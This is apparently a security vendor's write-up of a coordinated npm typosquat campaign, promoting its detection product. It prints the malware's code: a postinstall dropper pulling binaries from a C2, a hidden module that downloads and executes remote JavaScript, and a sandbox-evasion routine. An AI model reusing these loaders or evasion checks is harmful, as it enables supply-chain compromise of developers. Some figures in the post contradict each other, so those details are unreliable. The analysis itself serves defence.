Two Attack Vectors, One Publisher: How SecureNexus SOVA Caught a Coordinated npm Typosquat Campaign

The Discovery

On May 18, 2026, a package called react-tracked-tony appeared on npm. It claimed to be a React state-tracking library, a fork of the popular react-tracked by dai-shi (1.6M weekly downloads). Seventeen hours later, SecureNexus SOVA flagged it as malicious with 0.99 confidence.

Within hours, SOVA's maintainer correlation surfaced three more packages by the same publisher. Two completely different malware delivery mechanisms. One burner account. Target surface: 15.8M weekly downloads.

“Two completely different malware delivery mechanisms. Same publisher. Same sandbox evasion code. Twelve days from first typosquat to confirmed C2+RCE.”

Package 1: martinez-polygon-clipping-tony - The Postinstall Dropper

This package claims to be a Martinez polygon clipping algorithm -- a computational geometry library with vitest, tsc, and a legitimate-looking README. 240 downloads. From the outside, nothing looks suspicious.

The package.json contains the attack trigger. A single line in the scripts section:

// package.json -- the line that triggers everything
"scripts": {
  "postinstall": "node scripts/postinstall.js"
}

Postinstall fires automatically on npm install. No import. No require. No code path needed. Even a transitive dependency with this hook has the same power.

The C2 Configuration

// C2 defaults to RFC 1918 PRIVATE IP
const BASE = (process.env.STARSHIP_BASE || 'http://10.10.6.129:8787')
  .replace(/\/$/, '');

// Cross-platform payload dispatch table
function unixDropperId() {
  const plat = os.platform();       // linux | darwin | win32
  const arch = process.arch;        // x64 | arm64 | arm
  return `agent-${plat}-${arch}`;   // e.g. agent-linux-x64
}

10.10.6.129 is an RFC 1918 private address -- the attacker's local testing infrastructure, accidentally published. STARSHIP_BASE env var overrides to any server. Every OS-CPU combination maps to a specific binary on the C2.

The Execution Chain

function run() {
  const cloud = isLikelyCloudOrManagedEnvironment();
  if (cloud.skip) return;  // EXIT if sandbox detected

  const id = unixDropperId();
  const outName = path.join(os.tmpdir(), id);

  fetchToFile(`${BASE}/droppers/${id}`, outName, (err) => {
    fs.chmodSync(outName, 0o755);        // make executable
    const child = spawn(outName, [], {
      detached: true,                     // survive npm exit
      stdio: 'ignore'                     // no console output
    });
    child.unref();                        // detach from parent
  });
}
run();

“detached: true, stdio: 'ignore', child.unref() -- the process outlives npm install, runs silently, no console output. Victim sees a successful install. Attacker gets a persistent agent.”

SOVA Analysis: 9 flags across 7 scanned files. 8 signal categories: npm_install_hook_present, capability:shell, capability:network, capability:filesystem, capability:env_read, hardcoded_endpoint, endpoint_inventory, typosquat_candidate. Risk score: 15. Verdict: MALICIOUS.

Package 2: react-tracked-tony - The Hidden C2 Beacon

Typosquats react-tracked, dai-shi's React library (1.6M weekly). No postinstall hook. Hides endex.js in three locations: src/, dist/, dist/cjs/. Never imported. Activates via side-effects when the module graph loads.

C2 Contact - TLS Disabled

const normalizeHttpsUrl = (s) => {
  let x = String(s ?? '').trim();
  if (!x) x = 'https://almondco.online/api';  // HARDCODED C2
  return x;
};
const BASE = normalizeHttpsUrl(process.env.STARSHIP_BASE);

// CRITICAL: TLS certificate validation DISABLED
const httpsOpts = { rejectUnauthorized: false };

Same STARSHIP_BASE override as the postinstall dropper -- confirming shared infrastructure. rejectUnauthorized: false accepts any certificate, enabling MITM interception of C2 traffic.

The Trigger: How endex.js Gets Loaded

The most sophisticated part of this malware is not the payload itself — it is how the payload gets loaded. The public API entry point src/index.ts contains a conditional import that activates endex.js only in Node.js server environments:

// src/index.ts -- THE PUBLIC ENTRY POINT
export { createContainer } from './createContainer.js';
export { createTrackedSelector } from './createTrackedSelector.js';
export { getUntracked as getUntrackedObject } from 'proxy-compare';

// MALWARE TRIGGER -- conditional dynamic import
if (typeof process === 'object' && typeof window === 'undefined') {
  import('./endex.js');
}

This is a deliberate evasion technique. The typeof process === 'object' check ensures the import only fires in Node.js — not in a browser. The typeof window === 'undefined' check ensures it does not fire in browser bundlers like webpack or vite that polyfill process. Static analysis tools that scan the import graph see a dynamic import() and cannot trace it. Build tools see the window guard and tree-shake it out. Only a production Node.js server running this package will execute endex.js.

The compiled CommonJS version in dist/cjs/index.js does the same thing with require(): Promise.resolve().then(() => __importStar(require('./endex.js'))) — identical conditional, identical trigger, identical evasion.

“The conditional import is the most overlooked piece of this attack. The malware is hidden in plain sight — in the public API entry point — behind a runtime gate that only opens on Node.js servers. Static analysis, browser bundlers, and build-time scanners all miss it.”

Remote Code Execution

const main = async function () {
  const cloud = isLikelyCloudOrManagedEnvironment();
  if (cloud.skip) return;  // EXIT if sandbox detected

  const url = `${BASE}/droppers/38jmkse`;
  const raw = await fetchOctetBuffers(url);
  const text = raw.toString('utf8');

  // EXECUTE with full Node.js require access
  const tail = `\n;(typeof run==="function")&&run(${JSON.stringify(BASE)});\n`;
  new Function('require', text + tail)(require);
};
main();

“new Function('require', ...)(require) -- gives downloaded payload full access to Node.js native modules, filesystem, network, child processes, and every npm package in the project. Attacker updates payload anytime without republishing.”

SOVA Analysis: 32 flags across 28 scanned files. 9 signal categories: dynamic_code_execution, capability:network, capability:crypto, capability:env_read, capability:filesystem, hidden_dependency, endpoint_inventory, hardcoded_endpoint, typosquat_candidate. Risk score: 48. Verdict: MALICIOUS (0.99 confidence).

Loading image…

Shared DNA: The Sandbox Evasion Module

Both payloads contain isLikelyCloudOrManagedEnvironment() -- structurally identical in postinstall.js and endex.js. Same function name, same checks, same return signature. Strongest evidence of common authorship.

The function checks process.env for 14+ indicators: GITHUB_ACTIONS, GITLAB_CI, CIRCLECI, BUILDKITE, TRAVIS, CF_PAGES, VERCEL, NETLIFY, KUBERNETES_SERVICE_HOST, AWS_EXECUTION_ENV, ECS_CONTAINER_METADATA_URI, WEBSITE_SITE_NAME, K_SERVICE, CLOUD_RUN_JOB, GOOGLE_CLOUD_PROJECT, and more. Any match causes the payload to exit silently.

If no cloud variable is found, it escalates to kernel-level fingerprinting -- reading /sys/class/dmi/id/sys_vendor and /sys/class/dmi/id/product_name directly from the Linux kernel to check for Amazon (EC2), Google (GCE), and Microsoft Corporation (Azure) hardware manufacturer strings.

// Kernel-level hardware fingerprinting
if (os.platform() === 'linux') {
  const vendor = fs.readFileSync(
    '/sys/class/dmi/id/sys_vendor', 'utf8'
  ).trim().toLowerCase();

  if (vendor.includes('amazon'))               return SKIP;  // EC2
  if (vendor.includes('google'))               return SKIP;  // GCE
  if (vendor.includes('microsoft corporation')) return SKIP;  // Azure

  // QEMU + cloud SDK = analysis sandbox (not dev VM)
  if (vendor.includes('qemu') &&
      (e.AWS_REGION || e.GOOGLE_CLOUD_PROJECT || e.AZURE_CLIENT_ID))
    return SKIP;
}

“QEMU alone could be a developer's local VM. QEMU plus cloud credentials means a cloud-based analysis sandbox. The attacker understood this distinction and coded for it explicitly -- not amateur tradecraft.”

How SOVA Detected the Campaign

SOVA caught react-tracked-tony within under 3 hours of npm publish through a four-layer detection chain.

Loading image…

Layer 1 - Static Analysis: 200+ detection rules flagged 32 of 28 scanned files across 9 signal categories. Key triggers: dynamic_code_execution (new Function() on line 135), capability:network (C2 beacon to almondco.online), capability:crypto (rejectUnauthorized: false), hidden_dependency (undeclared bundled modules), and typosquat_candidate (Levenshtein distance to react-tracked). Risk score: 48.

Layer 2 - Contextual AI Review: SOVA's automated review analyzed the full source code with context. Identified endex.js across all three locations, traced the C2 connection, recognized the sandbox evasion as structurally identical to known patterns, and connected six independent signals into a single verdict: malicious, confidence 0.99.

Layer 3 - Maintainer Correlation: SOVA automatically surfaced all packages by christiano_129 -- revealing the full 4-package campaign, including the postinstall dropper that used a completely different attack vector.

Layer 4 - Source Verification: SOVA's artifact storage allowed direct tarball extraction. Both endex.js (135 lines) and postinstall.js (172 lines) were present in readable, unobfuscated source form. The attacker had not even minified the evidence.

Package 3: use-context-selector-tony - The Second dai-shi Target

This package typosquats use-context-selector (6.1M weekly downloads), another dai-shi library. Together with react-tracked-tony, the attacker targeted BOTH of dai-shi's major React libraries. These two libraries are commonly used together -- a developer using one is likely using the other.

The typosquat pattern is identical to react-tracked-tony -- add a "-tony" suffix to a legitimate package name. Both were published within 24 hours of each other (May 17-18).

// Typosquat pattern -- same technique across both targets
// Legitimate:    use-context-selector   (dai-shi, 6.1M weekly)
// Malicious:     use-context-selector-tony (christiano_129)
//
// Legitimate:    react-tracked          (dai-shi, 1.6M weekly)
// Malicious:     react-tracked-tony     (christiano_129)
//
// SOVA signal: typosquat_candidate (Levenshtein distance < 5)
// SOVA signal: hidden_dependency (bundled 'react' not declared)
// SOVA signal: endpoint_inventory (3 endpoints in README/package.json)
// Risk score: 15  |  Verdict: MALICIOUS

SOVA flagged 7 out of 8 files across 3 signal categories. The hidden dependency signal is notable -- the package bundles code from undeclared dependencies, a technique used to hide malicious imports from dependency scanners. The package has no Prism review yet (queued for analysis), but the maintainer correlation to two confirmed-malware packages elevates its risk significantly.

Package 4: martinez-polygon-clipping-simul-dalton - The First Attempt

This was the attacker's first package, published May 6 -- twelve days before the confirmed C2+RCE payload. It typosquats martinez-polygon-clipping (8.1M weekly downloads) with a different suffix than the later -tony variant. The same library was targeted twice with two different typosquat names.

// Author impersonation -- copies legitimate README verbatim
// Legitimate:  martinez-polygon-clipping (w8r, 8.1M weekly)
// Malicious 1: martinez-polygon-clipping-simul-dalton (christiano_129)
// Malicious 2: martinez-polygon-clipping-tony       (christiano_129)
//
// SOVA finding: README copied word-for-word from legitimate package
// SOVA finding: Published from daltonchristiano060-gif/simul_martinez
//               (unrelated to legitimate repository)
// SOVA signal: capability:filesystem
//   Evidence: node:fs appendFileSync usage -- writes on import
//   No legitimate purpose in a pure geometry algorithm
// SOVA signal: hardcoded_endpoint (localhost references in README)
// SOVA signal: endpoint_inventory (8 endpoints in README/package.json)
// SOVA signal: typosquat_candidate
// Risk score: 8  |  Verdict: SUSPICIOUS (AI review: 0.7 confidence)

SOVA flagged 4 out of 6 files. This package is less sophisticated -- no C2, no RCE, no sandbox evasion -- but it represents the attacker's first iteration. Nine days later, they deployed the postinstall dropper. Eleven days later, the hidden C2 module. The escalation from suspicious typosquat to confirmed malware is visible in the publication timeline.

“The attacker iterated. First package: basic typosquat with author impersonation. Second package (same target, different name): full postinstall dropper. Third and fourth: hidden C2+RCE targeting a completely different ecosystem. Twelve days from experiment to weaponized malware.”

The Publisher

Username:        christiano_129
Email:           [email protected]
Trust Score:     0.48 / 1.0
Account Age:     0.15 / 1.0  (brand new)
Packages:        4 (all published May 6-18, 2026)
GitHub:          daltonchristiano060-gif (empty, unrelated repos)
Domain:          Not verified
Geography:       Low diversity
Campaign Window: 12 days

Classic burner account. Created for this campaign. No prior publishing history. No linked identity. No verified domain. Every package is a typosquat. Every package targets a library with 1.6M+ weekly downloads.

The Blast Radius

Approximately 1,000 combined downloads across all four packages. Their legitimate targets serve 15.8M weekly downloads. A typosquat needs to trick one developer with publish access to a downstream package. From there, the malware propagates through the entire dependency tree.

The campaign was caught early. At under 3 hours, react-tracked-tony had fewer than 150 downloads. Real-time registry monitoring was the difference between intercepting a campaign and investigating a breach with thousands of downstream victims.

Key Takeaways

1. Postinstall hooks are the most dangerous vector. They fire automatically on npm install with no import required. Even a transitive dependency can execute arbitrary code through its postinstall script.
2. Sandbox evasion is now standard in supply chain malware. Both payloads check 14+ CI/cloud indicators and read kernel DMI directly. Security tools running in cloud environments will miss these payloads entirely -- the malware detects the sandbox and exits.
3. One publisher equals multiple packages. Maintainer correlation must be automatic. SOVA surfaces all packages by a flagged publisher, revealing the full campaign scope including packages using completely different attack vectors.
4. Detection velocity is everything. 150 downloads at 17 hours. Potentially 150,000 at one week. Real-time monitoring is the difference between early interception and investigating thousands of downstream victims.
5. Multi-layered detection is essential. Static analysis catches patterns. AI review connects them into verdicts. Maintainer correlation reveals scope. Source verification confirms. No single layer is sufficient alone.

This campaign was detected, analyzed, and reported to npm by the SecureNexus SOVA supply chain defense platform. The publisher christiano_129 and all four packages have been reported to the npm security team for takedown.

Learn more at https://www.securenexus.ai/products/sova